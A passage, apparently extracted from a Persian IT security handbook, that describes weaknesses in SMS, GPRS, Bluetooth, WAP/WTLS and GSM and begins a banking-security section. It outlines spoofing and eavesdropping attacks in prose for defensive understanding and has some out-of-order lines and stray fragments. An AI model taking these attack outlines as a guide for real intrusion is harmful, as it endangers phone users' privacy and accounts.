‫‪ SMS‬ﻓﺮﺳﺘﺎﺩ‪ ،‬ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎﻱ ‪ SMS‬ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻛﺮﺩ‬
‫ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺧﺮﺍﺑﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺷﻮﻧﺪ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ‪ ١٦٦(STK) SIM‬ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ‬
‫‪ SMS‬ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ‪ STK‬ﻳﻚ ﺳﺎﺯ ﻭ ﻛﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳـﺔ‬
‫ﺍﻧﺘﻘﺎﻝ‪ ١٦٧‬ﺍﺳﺖ‪ ،‬ﻭ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺎﻳﺎﻧـﻪ ﺑـﻪ ﭘﺎﻳﺎﻧـﻪ‪ ١٦٨‬ﺭﺍ‬
‫ﺗﻀﻤﻴﻦ ﻛﻨﺪ‪ .‬ﻳﻚ ﺭﻭﺍﻝ ﺩﻳﮕﺮ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴـﺖ ‪ SMS‬ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫‪Short Message Service‬‬
‫‪SIM Toolkit Technology‬‬
‫‪Transport Layer‬‬
‫‪End-to-End Confidentiality‬‬
‫‪165‬‬
‫‪166‬‬
‫‪167‬‬
‫‪168‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ‪GPRS‬‬
‫‪ ١٦٩GPRS‬ﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ IP‬ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺍﺗﺼﺎﻝ ﺩﺍﺋﻤﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻳﻦ‬
‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﻮﺯ ﺑﺮﺍﻱ ﺗﻘﺎﺿﺎﻫﺎﻱ ‪ WAP‬ﺑﻪ ‪SMS‬‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺑﺴﺘﺔ ‪ SMS‬ﺗﻘﻠﺒﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺗﻠﻔـﻦ‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﻭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﻌﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ‪ ،‬ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ‬
‫ﻃﻮﺭﻱ ﻓﺮﻳﺐ ﺩﻫﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺮﻡ ﻛﻪ ﮔﻤـﺎﻥ‬
‫ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘـﺖ ﺗﻘﻠﺒـﻲ ﺍﺳـﺖ‬
‫ﻭﺍﺭﺩ ﻛﻨﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻠﻔﻨﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ‪ GPRS‬ﺩﺍﺭﻧـﺪ ﺍﺯ‬
‫ﻗﺎﺑﻠﻴﺖ ‪ bluetooth‬ﻧﻴﺰ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﻫـﺮ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻗﺎﺑﻠﻴـﺖ‬
‫‪ bluetooth‬ﺷﺎﻣﻞ ﻳﻚ ﺁﺩﺭﺱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺑﻪ ﻧﻮﻋﻲ ﺑﻪ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ‬
‫ﺍﺭﺗﺒﺎﻁ ﺍﺳﺖ ﻧﻮﻋﻲ ﺍﻋﺘﻤﺎﺩ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﻫﻤﻴﻨﻜـﻪ ﺍﻳـﻦ ﺷﻨﺎﺳـﻪ ﺑـﻪ‬
‫ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﺑﺎ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﻭ ﺑﺮﺭﺳـﻲ‬
‫ﺷﻨﺎﺳﺔ ﺁﻧﻬـﺎ ﻣـﻲ ﺗـﻮﺍﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺿـﺒﻂ ﻧﻤـﻮﺩ‪ .‬ﺩﺭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ bluetooth‬ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ‪ ،‬ﻳـﻚ‬
‫ﻓﺮﺁﻳﻨﺪ ﻣﻘﺪﺍﺭﺩﻫﻲ ﺍﻭﻟﻴﻪ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺍﺯ ﻳﻚ ‪ PIN‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺑﺮﺧـﻲ ﺍﺑﺰﺍﺭﻫـﺎ ﺑـﻪ ﺷـﻤﺎ‬
‫ﺍﺟﺎﺯﻩ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺷﻤﺎﺭﺓ ‪ PIN‬ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ‪ PIN‬ﺭﺍ‬
‫ﺩﺭ ﺣﺎﻓﻈﺔ ﻳﻚ ﺩﺳـﺘﮕﺎﻩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﻧﻴـﺰ‬
‫ﺫﺧﻴﺮﻩ ﻧﻤﻮﺩ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻩ ﺗﺄﻣﻴﻦ ﻧﺒﺎﺷـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣـﺸﻜﻼﺕ ﻋﺪﻳـﺪﻩﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﺑﻴﺎﻳﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﺭﻣﺰﻫﺎﻱ ﻏﺎﻟﺐ ‪PIN‬ﻫﺎ ﺍﻋﺪﺍﺩ ﭼﻬﺎﺭ ﺭﻗﻤﻲ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﺷـﺎﻳﺪ ﺩﺭ‬
‫ﻧﻴﻤﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﻋﺪﺩ ‪ 0000‬ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﻨﻴــﺖ ‪ bluetooth‬ﺩﺭ ﮔــﺮﻭ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﺯ ﻛﻠﻴــﺪ ﺭﻣﺰﻧﮕــﺎﺭﻱ‬
‫ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺍﺯ ﻣﺸﺘﺮﻙ ﻣﻴﺎﻥ ﺍﻋﻀﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺗـﺼﻮﺭ‬
‫ﻛﻨﻴــﺪ ﻣــﻦ ﻭ ﺷــﻤﺎ ﺑــﺎ ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﺧــﻮﺩ ﻛــﻪ ﻗﺎﺑﻠﻴــﺖ‬
‫‪ bluetooth‬ﺩﺍﺭﻧﺪ ﺩﺭﺣـﺎﻝ ﻣﻜﺎﻟﻤـﻪ ﻫـﺴﺘﻴﻢ‪ .‬ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﻣﻜﺎﻟﻤﻪ‪ ،‬ﻣﻦ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺷﻤﺎ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻜﺎﻟﻤـﻪ ﺭﺍ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻢ‪ .‬ﻛﻤﻲ ﺑﻌـﺪﺗﺮ ﻳﻜـﻲ ﺍﺯ ﺩﻭﺳـﺘﺎﻧﺘﺎﻥ ﺑـﺎ ﺷـﻤﺎ‬
‫ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺍﺯ ﻛﻠﻴﺪ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‪.‬‬
‫ﻣﻦ ﻛﻪ ﻛﻠﻴﺪ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﺍﻧﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺁﺩﺭﺱ ﺟﻌﻠـﻲ‬
‫‪169 General Packet Radio Service‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪١٦٥‬‬
‫ﺑﺮﺭﺳﻲ ﺷﺨﺼﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺮﺍﻱ ﻳـﻚ ﻗﻄﻌـﻪ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭﺩﺍﺩﻱ‬
‫ﺑﻤﻨﻈﻮﺭ ﺗﻀﻤﻴﻦ ﻛﻞ ﭘﻴـﺎﻡ ﻭ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺧـﺪﻣﺎﺕ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﺑﺮﺭﺳﻲ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺛﺒﺖﺷﺪﺓ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﺷﺪ‪.‬‬
‫‪١٩٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻧﻢ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻢ‪ ،‬ﻭ ﺑﻪ ﻣﻜﺎﻟﻤـﺔ ﺷـﻤﺎ‬
‫ﮔﻮﺵ ﻛﻨﻢ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻢ ﺧﻮﺩﻡ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﻳﺎ ﻛـﺴﻲ‬
‫ﻛﻪ ﺩﺭﺣﺎﻝ ﻣﻜﺎﻟﻤﻪ ﺑﺎ ﺷﻤﺎ ﺍﺳﺖ ﺟﺎ ﺑﺰﻧﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ‪bluetooth‬‬
‫ﺗﻨﻬﺎ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ‪.‬‬
‫ﺿﻌﻔﻬﺎﻱ ‪WAP‬‬
‫ﻧﻘﻄﻪﺿﻌﻒ ﻣﺸﺘﺮﻙ ﺗﻤﺎﻡ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﺷﺪﻩ ‪ -‬ﺻـﺮﻓﻨﻈﺮ ﺍﺯ‬
‫ﻧﻮﻉ ﺷﺒﻜﻪ ‪ -‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﭘﺮﻭﺗﻜـﻞ ﻛـﺎﺭﺑﺮﺩ ﺑـﻲﺳـﻴﻢ )‪(WAP‬‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺯﺑـﺎﻥ ﻋﻼﻣﺘﮕـﺬﺍﺭﻱ ﺑـﻲﺳـﻴﻢ )‪ ١٧١(WML‬ﻭ ﺯﺑـﺎﻥ‬
‫ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﻭﺳﺎﻳﻞ ﺩﺳﺘﻲ )‪ ١٧٢(HDML‬ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺗﻮﺳﻌﻪ ﺩﻫﻨﺪﮔﺎﻥ ﺑﺮﺍﻱ ﺭﺍﺣﺖﺗﺮ ﺷﺪﻥ ﻛﺎﺭ‪ ،‬ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﺗـﻼﺵ‬
‫ﻣﻲﻛﻨﻨﺪ ﻃﺮﺍﺣﻲ ﺳﻨﺎﺭﻳﻮﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﻫﻨﮕـﺎﻡ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻠـﺰﻡ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻛﻮﺗـﺎﻫﺘﺮﻳﻦ‬
‫ﻼ ﺍﻋﺪﺍﺩﻱ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷـﻤﺎﺭﻩ ﻛـﺎﺭﺕ‬
‫ﻭﺭﻭﺩﻱ ﻣﻤﻜﻦ ﺑﺎﺷﺪ ‪ -‬ﻣﺜ ﹰ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻳﺎ ﺷﻤﺎﺭﺓ ﺣﺴﺎﺏ ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﻪ‬
‫ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﻗـﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ ﺩﺍﺩﻩﻫـﺎ ﺩﺭﻭﻥ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﻭ ﺩﺭ ﻭﺳـﻴﻠﺔ ﺩﺳـﺘﻲ ﻣﺮﺑﻮﻃـﻪ‬
‫ﺗﻨﻬﺎ ﻳﻚ ‪ cookie‬ﺣﺎﻭﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻳﻲ ﻣﺜﺎﻝ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ ﺳـﺮﻣﺎﻳﻪ‬
‫ﺻﺮﻓﹰﺎ ﺑﻪ ﻳﻚ ‪ PIN‬ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺁﻥ ﻫـﻢ ﺑـﻲﻧﻴـﺎﺯ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺗﺒـﺎﺩﻻﺕ ﻣﻴـﺎﻥ ﺩﺳـﺘﮕﺎﻫﻬﺎ ﺩﺭ‬
‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺮ ﻋﻬﺪﺓ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧـﺎﻡ ﺍﻣﻨﻴـﺖ ﻻﻳـﺔ‬
‫ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ )‪ ١٧٣(WTLS‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪١٧٠‬‬
‫ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﻛﻪ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ ۱۲۸ ١٧٤SSL‬ﺑﻴﺘـﻲ ﻣﻮﺑﺎﻳـﻞ ﻳـﺎ‬
‫ﭘﺮﻭﺗﻜﻞ ‪) IPSec‬ﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺑﺪﻟﻴﻞ ﻛﻤﺒﻮﺩ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻭ ﻗﺪﺭﺕ‬
‫ﭘﺮﺩﺍﺯﺵ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﻮﺩ‪ ،‬ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻗﺴﻤﺘﻲ‬
‫ﺍﺯ ﺷﺒﻜﻪ ﻳﻚ ﺣﻠﻘﺔ ﺿﻌﻴﻒ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪ .‬ﺣﺘـﻲ ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻧﻴـﺰ ﺿـﻌﻔﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺩﺍﺧﻞ ﻭﺳﻴﻠﻪ )ﻭ ﻧـﻪ ﻛﺎﻧـﺎﻝ ﺍﺭﺗﺒـﺎﻃﻲ( ﻫﻤﭽﻨـﺎﻥ ﻭﺟـﻮﺩ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﺳـﺎﺩﮔﻲ ﺧﺪﺷـﻪﺩﺍﺭ ﻣـﻲ‪-‬‬
‫ﺷﻮﺩ‪ GSM .‬ﺍﺯ ‪ WAP‬ﻭ ‪ WTLS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻌﺎﺩﻝ‬
‫‪ SSL‬ﺍﺳﺖ ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺿـﻌﻴﻔﺘﺮ‪WTLS .‬‬
‫ﺑﺎ ‪ SSL‬ﻛﻪ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺻﻨﻌﺘﻲ ﺍﺳـﺖ ﺳـﺎﺯﮔﺎﺭ ﻧﻤـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﻭﻥ ﻳﻚ ‪ gateway‬ﻣﻲﺭﻭﻧﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻭﺍﺭﺩ‬
‫‪Wireless Application Protocol‬‬
‫‪Wireless Markup Language‬‬
‫‪Handled Device Markup Language‬‬
‫‪Wireless Transport Layer Security‬‬
‫‪Secure Socket Layer‬‬
‫‪170‬‬
‫‪171‬‬
‫‪172‬‬
‫‪173‬‬
‫‪174‬‬
‫ﻳﻚ ﺷﺒﻜﻪ ﺳﻴﻤﻲ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺑـﻪ ﺳـﻤﺖ ﻣﻘـﺼﺪ ﻧﻬـﺎﻳﻲ ﺧـﻮﺩ‬
‫ﻫــﺪﺍﻳﺖ ﮔﺮﺩﻧــﺪ‪ .‬ﺩﺭ ﺁﻥ ‪ ،gateway‬ﭘﻴــﺎﻡ ‪ WTLS‬ﺑــﻪ ‪SSL‬‬
‫ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ‪ gateway‬ﭘﻴﺎﻡ ﺑﺮﺍﻱ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ‬
‫ﻣﻲﮔﺮﺩﺩ ﻭ ﻫﻤﻴﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﻛﻞ ﺍﺭﺗﺒﺎﻁ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻱ ﭘﻴﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮ ﮔﺮﺩﺩ‪.‬‬
‫ﺩﺯﺩ ﹺ‬
‫ﻩ‪.‬‬
‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ‪GSM‬‬
‫ﻧﻘــﺎﻳﺺ ﺫﺍﺗــﻲ ‪ GSM‬ﺑﺮﺍﺣﺘــﻲ ﻗﺎﺑــﻞ ﺭﻓــﻊ ﻧﻴــﺴﺘﻨﺪ‪ .‬ﺗﻠﻔﻨﻬــﺎ ﻭ‬
‫‪PDA‬ﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻮﻣﹰﺎ ﻗﺎﺩﺭ‬
‫ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻧﻤﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ ‪GSM‬‬
‫ﻣﺜﻞ ﻫﻤﺘﺎﻱ ﺁﻣﺮﻳﻜﺎﻳﻲ ﺧﻮﺩ ‪ -‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ - 802.11‬ﻧﺴﺒﺖ ﺑﻪ‬
‫‪ war driving‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﭼﻨﺪ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳـﻲ‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ 802.11‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ ﻧﻪ ﻭﺳـﺎﻳﻞ‬
‫ﮔﻮﺷﻲﺩﺍﺭ‪ ،‬ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﺯ ﻣـﺆﺛﺮﻱ ﻧـﺴﺒﺖ‬
‫ﺑﻪ ‪ GSM‬ﺑﻬﺒﻮﺩ ﻳﺎﺑﺪ‪ .‬ﺷﺒﻜﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪VPN‬ﻫـﺎ(‬
‫ﻓﺼﻞ ﻣﺸﺘﺮﻙ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻳـﻦ ﺩﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ‬
‫ﻻ ﺑﻌﻨــﻮﺍﻥ ﺭﺍﻩﺣﻠــﻲ ﺑــﺮﺍﻱ ﺭﻓــﻊ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ‪ VPN‬ﻣﻌﻤــﻮ ﹰ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻌﻠﻲ ‪ 802.11‬ﻭ ‪ GSM‬ﺑـﺸﻤﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﺑـﺎ‬
‫ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﻻﻳﺔ ﺧﺎﺹ ﺍﻧﺘﻈـﺎﺭ‬
‫ﻣﻌﺠﺰﻩ ﺩﺍﺷﺖ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻭ ﻧﻴﺰ ﺑﺨـﺶ‬
‫ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫ﻭ‪.‬‬
‫ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬
‫ﺩﺭ ﻧﺘﻴﺠﺔ ﮔﺴﺘﺮﺵ ﻓﺮﺍﻭﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ GSM‬ﺩﺭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻭ ﺍﻣﻨﻴﺘـﻲ ﭼﻨـﺪﻱ ﺑﻮﺟـﻮﺩ‬
‫ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺩﺭﺻـﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﭘﺮﺩﺍﺧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺨﺺ ﺛﺎﻟﺚ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﺓ ﻛﻠﻲ‪ ،‬ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ‬
